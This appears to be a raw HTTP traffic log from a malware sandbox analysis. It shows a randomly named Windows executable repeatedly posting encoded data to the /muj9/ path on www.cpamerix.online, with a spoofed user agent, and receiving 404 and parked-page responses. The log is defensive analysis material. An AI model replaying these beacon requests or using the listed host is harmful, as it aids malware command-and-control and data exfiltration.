                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Oct 23, 2024 07:03:50.333424091 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:50 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 148
                                                                                                                                        Connection: close
                                                                                                                                        ETag: "66a72cd5-94"
                                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        13192.168.2.759660194.58.112.17480484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:55.909245014 CEST754OUTPOST /muj9/ HTTP/1.1
                                                                                                                                        Host: www.cpamerix.online
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.cpamerix.online
                                                                                                                                        Content-Length: 219
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.cpamerix.online/muj9/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 73 69 2f 49 34 75 37 4c 47 32 5a 72 74 64 4a 61 79 6b 73 46 49 4c 4f 67 71 64 5a 32 67 46 79 77 33 67 69 65 37 77 57 78 64 67 55 33 63 56 34 34 35 35 73 30 42 6f 36 48 37 50 47 4f 30 6e 5a 72 63 37 77 48 57 30 74 52 30 67 5a 45 6a 68 78 38 64 7a 62 4f 6f 6d 78 53 62 6d 31 68 4e 52 4f 69 36 73 71 50 74 4b 78 6b 69 54 68 74 72 6c 56 52 73 4f 34 73 65 37 74 50 70 58 37 75 6b 52 37 34 50 38 73 71 62 50 6f 6c 42 4f 52 76 6b 50 62 70 30 4f 34 6c 67 78 44 6f 69 36 68 76 66 31 32 34 6c 53 6e 76 5a 71 6d 64 51 4f 42 63 35 49 46 6b 78 73 63 55 33 33 6b 71 49 71 50 56 61 4d 50 4e 58 71 61 65 4a 33 63 77 4c 6b 2f 31 72 41 78 58 51 67 3d 3d
                                                                                                                                        Data Ascii: fvM8Gh=si/I4u7LG2ZrtdJayksFILOgqdZ2gFyw3gie7wWxdgU3cV4455s0Bo6H7PGO0nZrc7wHW0tR0gZEjhx8dzbOomxSbm1hNROi6sqPtKxkiThtrlVRsO4se7tPpX7ukR74P8sqbPolBORvkPbp0O4lgxDoi6hvf124lSnvZqmdQOBc5IFkxscU33kqIqPVaMPNXqaeJ3cwLk/1rAxXQg==
                                                                                                                                        Oct 23, 2024 07:03:56.709750891 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:56 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 [TRUNCATED]
                                                                                                                                        Data Ascii: d1aZko_1fQRERy8$(.PmHI#F}CvQ].)R~)*@9;s{gf{-'`C&eUqP:\Zh\A{'$gGW~a3sO*!F?0;)hlD9s;aR'vla/w]#+Z!i2rvw_4-/#UP[6DUfL;1tUj?F<>:9l[g776Xv2hCukSieB2aCVeZE,q^AEAlcnUcWN~n1Y$~f{vk7Mr`wb_l:AuC<,NDh{HRI]L|%KK~r~C%}z|oZkjs3:n PED3.~eJGMh73NNB3wT,v`[A,!F,tl8`n[5<b(j,j.wUCrcrcxlKAQNMH5=*_d&-+K"BK3<g>kg8n=jTX+0\J$p)'/x)=k},\EcJ0c/W|l,;L~Q'3;`&Gg-<It)F*)RjC' "1yhW)"*B<(N'UaZ3xoCdM@ [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:03:56.709811926 CEST1236INData Raw: 9b 75 ea fe 12 bb ba 86 87 68 76 fc 8e 2b fa d2 d0 91 8d 09 65 14 f8 83 a7 3b 05 54 0c b8 db 94 c9 fe 09 f4 22 6d c1 bc 4f 92 fb c0 99 92 30 c3 b2 f3 b1 ab 8d 13 8f bb da e5 85 26 dd 00 7c e7 21 51 fa 02 72 ff 8c f4 f7 20 fd 3d 42 e4 49 fa 65 f2
                                                                                                                                        Data Ascii: uhv+e;T"mO0&|!Qr =BIe=+n@Umq$t7]]N<d%f8> `.(K(C/0KSF2(o?J,xDB/&\lGz<4]\Jds9iN?";
                                                                                                                                        Oct 23, 2024 07:03:56.709844112 CEST424INData Raw: bb d7 d2 25 c8 33 5e 23 2c 1c 58 3a ae 5f f4 fc a4 23 fb ec da 23 bf 14 81 e2 3d 2e 79 8d fe d4 af 9f 62 a5 1f a7 cf 6a 8c da 4d 75 d3 81 53 4e 9c 4b d6 d9 6c 27 ea 1f 09 6c f0 fd b5 99 c1 7b a7 66 be 4e 65 e1 94 b4 e3 f4 16 ca d9 e6 11 a3 b3 c5
                                                                                                                                        Data Ascii: %3^#,X:_##=.ybjMuSNKl'l{fNe69{86;dC` zuk>;i"K2eZ h9{v4Z)&-L:E}_W37Jeqin,Iq"#yW7#GL,%
                                                                                                                                        Oct 23, 2024 07:03:56.709974051 CEST644INData Raw: d9 98 81 81 24 8b 53 86 7c 4b df 51 57 99 e3 4f 55 51 77 86 eb 73 1d 2e b2 aa e3 e3 ca ec 0a 46 c1 66 85 38 52 4d 7b 83 1c 5d 06 82 2a b9 8a 35 d7 68 d1 37 36 5f 31 2e 6c d5 cd b3 1f 98 ea 7b 7d f3 c3 0f e2 ad b3 b0 85 42 46 21 54 73 92 ba 9d 50
                                                                                                                                        Data Ascii: $S|KQWOUQws.Ff8RM{]*5h76_1.l{}BF!TsPRav}\>[K+A,)MV0R@cFI^>o)$JA+IVziSd"=FaTRM&Y)dL=*-K`2a193,$CNCEV/E@id6


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        14192.168.2.759661194.58.112.17480484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:58.459850073 CEST774OUTPOST /muj9/ HTTP/1.1
                                                                                                                                        Host: www.cpamerix.online
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.cpamerix.online
                                                                                                                                        Content-Length: 239
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.cpamerix.online/muj9/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 73 69 2f 49 34 75 37 4c 47 32 5a 72 33 34 42 61 2b 6e 45 46 4a 72 4f 6a 6c 39 5a 32 71 6c 79 38 33 67 75 65 37 31 33 32 64 54 77 33 63 77 55 34 2b 4d 51 30 41 6f 36 48 7a 76 47 4c 35 48 5a 77 63 37 4d 6c 57 77 6c 52 30 67 64 45 6a 6c 31 38 64 43 62 4a 71 32 78 63 57 47 31 76 51 42 4f 69 36 73 71 50 74 4f 63 44 69 54 35 74 6f 55 46 52 73 72 4d 72 58 62 74 49 2b 6e 37 75 67 52 37 38 50 38 74 2f 62 4b 78 79 42 4e 6c 76 6b 50 4c 70 31 62 4d 6d 70 78 44 71 76 61 67 38 52 41 76 52 68 44 54 4f 58 59 65 4a 62 4f 63 2b 31 65 59 47 72 4f 51 34 70 6d 63 52 4d 6f 72 6a 4e 71 53 34 56 72 65 47 45 56 6f 52 55 54 61 66 6d 53 51 54 47 55 68 38 56 71 64 34 65 49 53 49 7a 2f 59 5a 63 45 50 2b 69 50 38 3d
                                                                                                                                        Data Ascii: fvM8Gh=si/I4u7LG2Zr34Ba+nEFJrOjl9Z2qly83gue7132dTw3cwU4+MQ0Ao6HzvGL5HZwc7MlWwlR0gdEjl18dCbJq2xcWG1vQBOi6sqPtOcDiT5toUFRsrMrXbtI+n7ugR78P8t/bKxyBNlvkPLp1bMmpxDqvag8RAvRhDTOXYeJbOc+1eYGrOQ4pmcRMorjNqS4VreGEVoRUTafmSQTGUh8Vqd4eISIz/YZcEP+iP8=
                                                                                                                                        Oct 23, 2024 07:03:59.356173992 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:59 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 [TRUNCATED]
                                                                                                                                        Data Ascii: d1aZko_1fQRERy8$(.PmHI#F}CvQ].)R~)*@9;s{gf{-'`C&eUqP:\Zh\A{'$gGW~a3sO*!F?0;)hlD9s;aR'vla/w]#+Z!i2rvw_4-/#UP[6DUfL;1tUj?F<>:9l[g776Xv2hCukSieB2aCVeZE,q^AEAlcnUcWN~n1Y$~f{vk7Mr`wb_l:AuC<,NDh{HRI]L|%KK~r~C%}z|oZkjs3:n PED3.~eJGMh73NNB3wT,v`[A,!F,tl8`n[5<b(j,j.wUCrcrcxlKAQNMH5=*_d&-+K"BK3<g>kg8n=jTX+0\J$p)'/x)=k},\EcJ0c/W|l,;L~Q'3;`&Gg-<It)F*)RjC' "1yhW)"*B<(N'UaZ3xoCdM@ [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:03:59.356195927 CEST1236INData Raw: 9b 75 ea fe 12 bb ba 86 87 68 76 fc 8e 2b fa d2 d0 91 8d 09 65 14 f8 83 a7 3b 05 54 0c b8 db 94 c9 fe 09 f4 22 6d c1 bc 4f 92 fb c0 99 92 30 c3 b2 f3 b1 ab 8d 13 8f bb da e5 85 26 dd 00 7c e7 21 51 fa 02 72 ff 8c f4 f7 20 fd 3d 42 e4 49 fa 65 f2
                                                                                                                                        Data Ascii: uhv+e;T"mO0&|!Qr =BIe=+n@Umq$t7]]N<d%f8> `.(K(C/0KSF2(o?J,xDB/&\lGz<4]\Jds9iN?";
                                                                                                                                        Oct 23, 2024 07:03:59.356205940 CEST424INData Raw: bb d7 d2 25 c8 33 5e 23 2c 1c 58 3a ae 5f f4 fc a4 23 fb ec da 23 bf 14 81 e2 3d 2e 79 8d fe d4 af 9f 62 a5 1f a7 cf 6a 8c da 4d 75 d3 81 53 4e 9c 4b d6 d9 6c 27 ea 1f 09 6c f0 fd b5 99 c1 7b a7 66 be 4e 65 e1 94 b4 e3 f4 16 ca d9 e6 11 a3 b3 c5
                                                                                                                                        Data Ascii: %3^#,X:_##=.ybjMuSNKl'l{fNe69{86;dC` zuk>;i"K2eZ h9{v4Z)&-L:E}_W37Jeqin,Iq"#yW7#GL,%
                                                                                                                                        Oct 23, 2024 07:03:59.356343031 CEST644INData Raw: d9 98 81 81 24 8b 53 86 7c 4b df 51 57 99 e3 4f 55 51 77 86 eb 73 1d 2e b2 aa e3 e3 ca ec 0a 46 c1 66 85 38 52 4d 7b 83 1c 5d 06 82 2a b9 8a 35 d7 68 d1 37 36 5f 31 2e 6c d5 cd b3 1f 98 ea 7b 7d f3 c3 0f e2 ad b3 b0 85 42 46 21 54 73 92 ba 9d 50
                                                                                                                                        Data Ascii: $S|KQWOUQws.Ff8RM{]*5h76_1.l{}BF!TsPRav}\>[K+A,)MV0R@cFI^>o)$JA+IVziSd"=FaTRM&Y)dL=*-K`2a193,$CNCEV/E@id6


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        15192.168.2.759662194.58.112.17480484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:04:01.014044046 CEST1787OUTPOST /muj9/ HTTP/1.1
                                                                                                                                        Host: www.cpamerix.online
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.cpamerix.online
                                                                                                                                        Content-Length: 1251
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.cpamerix.online/muj9/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 73 69 2f 49 34 75 37 4c 47 32 5a 72 33 34 42 61 2b 6e 45 46 4a 72 4f 6a 6c 39 5a 32 71 6c 79 38 33 67 75 65 37 31 33 32 64 54 34 33 66 43 63 34 35 62 45 30 44 6f 36 48 77 76 47 4b 35 48 59 79 63 2f 59 68 57 77 68 42 30 6d 42 45 6c 77 68 38 66 32 50 4a 67 32 78 63 4a 57 31 75 4e 52 4f 33 36 73 36 4c 74 4b 38 44 69 54 35 74 6f 57 74 52 6c 65 34 72 62 37 74 50 70 58 37 59 6b 52 36 68 50 38 31 76 62 4b 45 50 42 2b 39 76 68 62 58 70 79 74 51 6d 69 78 44 73 73 61 68 37 52 41 72 4b 68 44 50 38 58 63 57 6a 62 50 6f 2b 32 71 5a 79 36 4b 55 78 36 48 63 69 41 4a 2f 68 4b 49 57 48 63 6f 4f 62 44 48 68 7a 57 52 44 6a 74 68 73 6f 41 6a 51 44 48 72 35 59 58 37 69 54 30 35 78 78 47 46 43 2f 7a 5a 4c 70 4b 56 54 57 31 56 74 67 34 6c 43 50 63 2b 67 52 6d 55 44 4a 33 52 33 55 70 51 64 2f 6a 6a 79 56 34 63 75 39 45 59 73 6a 4d 4c 74 39 73 4a 59 59 68 4c 36 75 6f 33 46 2b 49 66 6f 79 6e 37 78 34 6b 36 54 38 6f 42 38 68 57 39 43 4d 30 67 59 57 38 79 58 52 6b 74 2b 6a 34 51 79 73 6a 50 6f 73 53 50 41 [TRUNCATED]
                                                                                                                                        Data Ascii: fvM8Gh=si/I4u7LG2Zr34Ba+nEFJrOjl9Z2qly83gue7132dT43fCc45bE0Do6HwvGK5HYyc/YhWwhB0mBElwh8f2PJg2xcJW1uNRO36s6LtK8DiT5toWtRle4rb7tPpX7YkR6hP81vbKEPB+9vhbXpytQmixDssah7RArKhDP8XcWjbPo+2qZy6KUx6HciAJ/hKIWHcoObDHhzWRDjthsoAjQDHr5YX7iT05xxGFC/zZLpKVTW1Vtg4lCPc+gRmUDJ3R3UpQd/jjyV4cu9EYsjMLt9sJYYhL6uo3F+Ifoyn7x4k6T8oB8hW9CM0gYW8yXRkt+j4QysjPosSPAThwi5U+e2khYNKl2AijQ0k+V2skXZfrYkLGozKQloUuQB+qxxFmJYqubFcxKtZVe9eEHHXuvG5dTH4Tmnqr0P02KqiXIxbQVFKh+z7tHSmcNKydW1Bq2nzcrFdSJipVVBFGPoY9KasEq998R1uITCuEtjYzB6TsVZGIhirx49JO4eBb8Yhpmo+s9c4W7JqIOODjjKrglyvbuMGWKZNHdOjpgWz9IwoW6fTUrbY3X/Y5++UXBCEPSU+QfqD7cJm7I+QpzDOkHjsGuyuaT2541976bsGlYHmQU0H9d4+4KcoM3r+58CH/fxKG9lw5ctLy3A0ypo8xewBf3/47rcr2YtrZFdgG8D2Cp19PiqAZLn8zaiGAGJ/h8T3Z03a3gETU8Or+RgKdvXb7GiumEp6lDXAoPijUOKUp4cPxhGPvJjxgdCSWlZRvCWmCN0V7RbRuTLMRDfWAcjtN0UcAg/gG1FwcDhtiwjjdwPhQRzzkwjeMMf+jpu/jSVpRQiXR5V/ZeeWTrNPIEE4BxwYrnDT7CRQf1nU+ywDJHPAoP2DMIh2ujIC+JRJJ+23XUGpzFj8PRZ3+M3+FB9D5zZrZa7p0mBx/kbo1IJtnum5n/JzTmglckhSRi0ovnuGGqiUqrxqGUVp/NRdz3pzHWLNJQsxJRAmaGjV3byEo3ih [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:04:01.911946058 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:04:01 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 [TRUNCATED]
                                                                                                                                        Data Ascii: d1aZko_1fQRERy8$(.PmHI#F}CvQ].)R~)*@9;s{gf{-'`C&eUqP:\Zh\A{'$gGW~a3sO*!F?0;)hlD9s;aR'vla/w]#+Z!i2rvw_4-/#UP[6DUfL;1tUj?F<>:9l[g776Xv2hCukSieB2aCVeZE,q^AEAlcnUcWN~n1Y$~f{vk7Mr`wb_l:AuC<,NDh{HRI]L|%KK~r~C%}z|oZkjs3:n PED3.~eJGMh73NNB3wT,v`[A,!F,tl8`n[5<b(j,j.wUCrcrcxlKAQNMH5=*_d&-+K"BK3<g>kg8n=jTX+0\J$p)'/x)=k},\EcJ0c/W|l,;L~Q'3;`&Gg-<It)F*)RjC' "1yhW)"*B<(N'UaZ3xoCdM@ [TRUNCATED]
                                                                                                                                        Oct 23, 2024 07:04:01.912000895 CEST1236INData Raw: 9b 75 ea fe 12 bb ba 86 87 68 76 fc 8e 2b fa d2 d0 91 8d 09 65 14 f8 83 a7 3b 05 54 0c b8 db 94 c9 fe 09 f4 22 6d c1 bc 4f 92 fb c0 99 92 30 c3 b2 f3 b1 ab 8d 13 8f bb da e5 85 26 dd 00 7c e7 21 51 fa 02 72 ff 8c f4 f7 20 fd 3d 42 e4 49 fa 65 f2
                                                                                                                                        Data Ascii: uhv+e;T"mO0&|!Qr =BIe=+n@Umq$t7]]N<d%f8> `.(K(C/0KSF2(o?J,xDB/&\lGz<4]\Jds9iN?";
                                                                                                                                        Oct 23, 2024 07:04:01.912018061 CEST424INData Raw: bb d7 d2 25 c8 33 5e 23 2c 1c 58 3a ae 5f f4 fc a4 23 fb ec da 23 bf 14 81 e2 3d 2e 79 8d fe d4 af 9f 62 a5 1f a7 cf 6a 8c da 4d 75 d3 81 53 4e 9c 4b d6 d9 6c 27 ea 1f 09 6c f0 fd b5 99 c1 7b a7 66 be 4e 65 e1 94 b4 e3 f4 16 ca d9 e6 11 a3 b3 c5
                                                                                                                                        Data Ascii: %3^#,X:_##=.ybjMuSNKl'l{fNe69{86;dC` zuk>;i"K2eZ h9{v4Z)&-L:E}_W37Jeqin,Iq"#yW7#GL,%
                                                                                                                                        Oct 23, 2024 07:04:01.912144899 CEST644INData Raw: d9 98 81 81 24 8b 53 86 7c 4b df 51 57 99 e3 4f 55 51 77 86 eb 73 1d 2e b2 aa e3 e3 ca ec 0a 46 c1 66 85 38 52 4d 7b 83 1c 5d 06 82 2a b9 8a 35 d7 68 d1 37 36 5f 31 2e 6c d5 cd b3 1f 98 ea 7b 7d f3 c3 0f e2 ad b3 b0 85 42 46 21 54 73 92 ba 9d 50
                                                                                                                                        Data Ascii: $S|KQWOUQws.Ff8RM{]*5h76_1.l{}BF!TsPRav}\>[K+A,)MV0R@cFI^>o)$JA+IVziSd"=FaTRM&Y)dL=*-K`2a193,$CNCEV/E@id6


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        16192.168.2.759663194.58.112.17480484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:04:03.548465967 CEST488OUTGET /muj9/?fvM8Gh=hgXo7easQgYwzYM50VVsBbrTpvYmtRva0zGF6x/wVx5xdFtAh4cdAJarj8a6/VZ0fLckawx66xls7kEuRRfHglkiUnpuSxGF6OqSwfVcl2N6vBJ8grdIeIpeinnOhUKuNcVRLIFrNYJr&DfDx=AFrxfzcH-Ld HTTP/1.1
                                                                                                                                        Host: www.cpamerix.online
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Oct 23, 2024 07:04:04.447998047 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:04:04 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 63 70 61 6d 65 72 69 78 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d [TRUNCATED]
